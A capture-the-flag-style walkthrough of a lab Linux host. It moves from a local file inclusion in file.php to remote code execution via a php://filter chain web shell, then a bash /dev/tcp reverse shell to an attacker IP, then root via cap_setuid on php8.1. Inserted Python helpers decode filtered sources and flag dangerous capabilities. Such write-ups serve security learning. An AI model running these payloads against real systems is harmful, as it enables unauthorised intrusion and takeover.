Enumeration#

As usual, I ran an initial scan of the target machine using Nmap to identify open ports and services.

nmap -sCV -p- -oN nmap.txt target.local

22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan revealed two open ports:

  • Port 22: SSH (OpenSSH 8.9p1 Ubuntu 3ubuntu0.6)
  • Port 80: HTTP (Apache httpd 2.4.52 on Ubuntu)

HTTP#

Upon visiting the website on port 80, I discovered a basic car maintenance company site that appeared to be a work in progress. The site was built with PHP, and the only interactive element was a “Contact Us” form.


I inspected the source code and found that every subpage was loaded through the index.php?page=* parameter. Other than that, the code was unremarkable.

This led me to fuzz the page parameter with gobuster to find out which other files index.php would include. The URL is quoted so the shell does not touch the ? and =, and 1286 (the size of the response for a page that does not exist) is excluded:

gobuster fuzz -u 'http://target.local/index.php?page=FUZZ.php' -w /usr/share/wordlists/dirb/big.txt --exclude-length 1286

Found: [Status=200] [Length=2732] [Word=about] http://target.local/index.php?page=about.php
Found: [Status=200] [Length=2788] [Word=cars] http://target.local/index.php?page=cars.php
Found: [Status=500] [Length=1029] [Word=connect] http://target.local/index.php?page=connect.php
Found: [Status=200] [Length=2681] [Word=contact] http://target.local/index.php?page=contact.php
Found: [Status=200] [Length=1487] [Word=file] http://target.local/index.php?page=file.php
Found: [Status=200] [Length=3825] [Word=home] http://target.local/index.php?page=home.php
Found: [Status=200] [Length=1846] [Word=news] http://target.local/index.php?page=news.php
Found: [Status=200] [Length=343434924] [Word=index] http://target.local/index.php?page=index.php

The fuzzing revealed several includable pages (the enormous response for page=index.php is consistent with index.php including itself). index.php?page=file.php stood out in particular: it rendered a form titled "Local File Inclusion Vulnerability" with a "File to include" field, i.e. a likely Local File Inclusion.


Exploitation#

LFI#

I first tried the form as rendered through http://target.local/index.php?page=file.php, but submitting it had no effect. Requesting http://target.local/file.php directly, however, let me exploit the LFI:

# target.local/file.php
/etc/passwd


# /etc/passwd on target.local (redacted)
andrew:x:1000:1000:Andrew Speed:/home/andrew:/bin/bash
nick:x:1001:1001:Nick Greenhorn,,,:/home/nick:/bin/bash

So there were two regular user accounts on the server: andrew (UID 1000) and nick (UID 1001).

LFI to RCE#

At this point I asked myself whether the LFI could be turned into remote code execution, which meant researching the topic first.

I came across PHP stream wrappers, in particular php://filter. It does not bypass any file permissions; what it does is let include() read a PHP file through a filter, so with convert.base64-encode the file's source is emitted as base64 instead of being executed. To confirm the wrapper was usable, I tried:

# target.local/file.php
php://filter/convert.base64-encode/resource=/../../../../../../../../../../../../../../var/www/html/file.php

Here the file named in the form is run through the base64-encode filter before include() sees it, so instead of being executed, its encoded source is rendered in the browser. Decoding the base64 content of file.php revealed a minimal LFI script:

<!-- file.php (decoded from base64) -->
<form method="get" action="<?php echo $_SERVER['PHP_SELF'];?>">
  File to include: <input type="text" name="file" />
  <input type="submit" />
</form>

<?php if (isset($_GET['file'])) { include($_GET['file']); } ?>
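A small helper for the source-read step above, added here as an example rather than taken from the write-up: it builds the php://filter URL and pulls the base64 blob out of the HTML that file.php wraps around the included content. The target URL is an assumption and the HTML response is constructed to mimic file.php's output.

```python
"""Recover PHP source through the php://filter base64 read.

Added example, not the write-up's code.  It builds the wrapper URL and
extracts/decodes the base64 blob that include() drops into the page body.
TARGET and SAMPLE_RESPONSE are assumptions/constructed data.
"""
import base64
import re
from urllib.parse import quote

TARGET = "http://target.local/file.php"  # assumed target


def filter_read_url(path: str, target: str = TARGET) -> str:
    """php://filter with convert.base64-encode: include() then emits the
    file's base64 instead of executing it, so PHP sources can be read."""
    resource = f"php://filter/convert.base64-encode/resource={path}"
    return f"{target}?file={quote(resource, safe='/:=')}"


# A base64 blob is a long run of base64 characters with optional padding.
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_source(html: str) -> str:
    """Take the longest base64 run in the response body and decode it."""
    blobs = _B64_BLOB.findall(html)
    if not blobs:
        raise ValueError("no base64 blob in response")
    blob = max(blobs, key=len)
    return base64.b64decode(blob, validate=True).decode("utf-8", "replace")


# Constructed response: file.php's form followed by the encoded source of a
# short PHP file, the way the real page renders it.
SAMPLE_SOURCE = "<?php if (isset($_GET['file'])) { include($_GET['file']); } ?>\n"
SAMPLE_RESPONSE = (
    "<html><body><h2>Local File Inclusion Vulnerability</h2>\n"
    '<form method="get" action="/file.php">File to include: '
    '<input type="text" name="file" /><input type="submit" /></form>\n'
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "\n</body></html>"
)

if __name__ == "__main__":
    print(filter_read_url("/var/www/html/file.php"))
    print(extract_source(SAMPLE_RESPONSE))
```

Against a live target you would fetch filter_read_url(path) and pass the body to extract_source; picking the longest base64 run keeps the form markup and any banner text from being mistaken for the blob.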

The decoded source also explains why the form did not work through index.php: its action is PHP_SELF, which in that case points back at index.php, and index.php never looks at a file parameter. More importantly, php://filter can do more than read sources. php_filter_chain_generator builds a chain of convert.iconv.* and base64 filters that, applied to the empty php://temp stream, produces arbitrary bytes, so include() ends up evaluating PHP of my choosing without any file having to be written to disk. I used it to generate a web-shell stub:

python3 php_filter_chain_generator.py --chain '<?php system($_REQUEST["cmd"]); ?>'

# output redacted
php://filter/.../resource=php://temp

[!danger] The payload has to go directly into the ?file= query parameter with &cmd=... appended. The form only ever submits file, so there is no way to pass cmd through it.

Sending this payload gave code execution:

http://target.local/file.php?file=php://filter/.../resource=php://temp&cmd=id
<html>
  <head></head>
  <body>
    <h2>Local File Inclusion Vulnerability</h2>

    <form method="get" action="/file.php">
      File to include: <input type="text" name="file" />
      <input type="submit" />
    </form>

    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [junk bytes trailing the id output: residue the filter chain leaves after the closing ?> tag; harmless]
  </body>
</html>

Bingo.

Revshell#

To get a reverse shell I started a netcat listener (nc -lvnp 1234) on my machine and prepared the payload:

# system() hands the command to /bin/sh (dash on Ubuntu), which understands neither &> nor /dev/tcp,
# so the redirections must be inside the single argument handed to bash -c
urlencode "/bin/bash -c 'exec /bin/bash -i &>/dev/tcp/192.168.56.103/1234 <&1'"

The URL-encoding is not optional: a raw & or > in the command would be parsed as part of the query string instead of reaching system(). I sent the encoded string as the cmd= parameter.

Immediately after getting in, I tried the home directories of both andrew and nick. The former was not readable as www-data; the latter held the user flag in /home/nick/user.txt.

Priv Esc#

Using linpeas.sh I found that the PHP 8.1 binary carries the cap_setuid file capability (getcap -r / 2>/dev/null shows the same without linpeas). Since cap_setuid=ep lets the process call setuid(0), any PHP code run through that binary can become root. This was my way to elevate privileges.

# linpeas output (redacted)
- /usr/bin/php8.1 cap_setuid=ep

# revshell: setuid(0) is allowed by the capability, and the shell spawned afterwards runs as uid 0
php -r "posix_setuid(0); system('/bin/sh');"
id

uid=0(root) gid=33(www-data) groups=33(www-data)

This gave me a root shell. The gid stays at www-data because only setuid was called (the binary has no cap_setgid), which makes no difference here: uid 0 is enough to read /root.
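The capability check linpeas did above, as a small standalone triage script. This is an added example and not part of the write-up; the getcap output it parses is constructed (covering both the current "path cap=flags" and the older "path = cap+flags" formats), not captured from the target.

```python
"""Flag binaries whose file capabilities hand out root.

Added example, not the write-up's code.  SAMPLE_GETCAP is constructed sample
output for `getcap -r / 2>/dev/null`, not real data from the target.
"""
import re

# Capabilities that on their own let an unprivileged caller become root or
# bypass file permissions.  Not exhaustive; cap_setuid is the one used above.
ESCALATION_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner",
}

_CAP_NAME = re.compile(r"cap_[a-z_]+")


def parse_getcap(output: str) -> dict:
    """Map each path in getcap output to the set of capability names on it."""
    caps_by_path = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path = line.split()[0]
        # Only look past the path so a directory name containing "cap_" is ignored.
        caps = set(_CAP_NAME.findall(line[len(path):]))
        if caps:
            caps_by_path[path] = caps
    return caps_by_path


def escalation_candidates(output: str) -> list:
    """Return (path, sorted dangerous caps) for every binary worth a closer look."""
    hits = []
    for path, caps in parse_getcap(output).items():
        dangerous = sorted(caps & ESCALATION_CAPS)
        if dangerous:
            hits.append((path, dangerous))
    return sorted(hits)


# Constructed sample output, mixing harmless network capabilities with the
# kind of entry linpeas flagged on the target (new and old getcap formats).
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/php8.1 cap_setuid=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/opt/legacy/helper = cap_setuid,cap_setgid+ep
"""

if __name__ == "__main__":
    for path, caps in escalation_candidates(SAMPLE_GETCAP):
        print(f"{path}: {','.join(caps)}")
```

Feed it the real getcap output (getcap -r / 2>/dev/null | python3 script.py after swapping the sample for sys.stdin) and anything it prints that is an interpreter, as php8.1 is here, is a one-liner away from root.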

Pwned?#

cd /root
cat root.txt

<redacted>

Sure.